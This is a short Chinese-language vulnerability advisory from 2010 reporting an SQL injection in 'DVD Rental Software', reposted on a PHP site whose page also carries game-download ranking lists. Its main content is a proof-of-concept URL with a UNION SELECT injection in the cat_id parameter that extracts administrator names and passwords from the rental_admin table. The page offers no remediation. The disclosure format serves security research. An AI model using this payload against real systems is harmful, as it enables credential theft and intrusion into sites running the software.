文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>DVD Rental Software SQL注射

DVD Rental Software SQL注射

时间:2010-11-20  来源:JaMbA

发布日期:2010-11.20
发布作者:JaMbA

影响版本:未知
官方地址:http://www.commodityrentals.com

漏洞类型:SQL注入
漏洞描述:DVD Rental Software SQL查询未对提权参数进行严格过滤,导致SQL注入!

 

POC:

http://server/path/index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--

 

 

标签分类: SQL注入

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载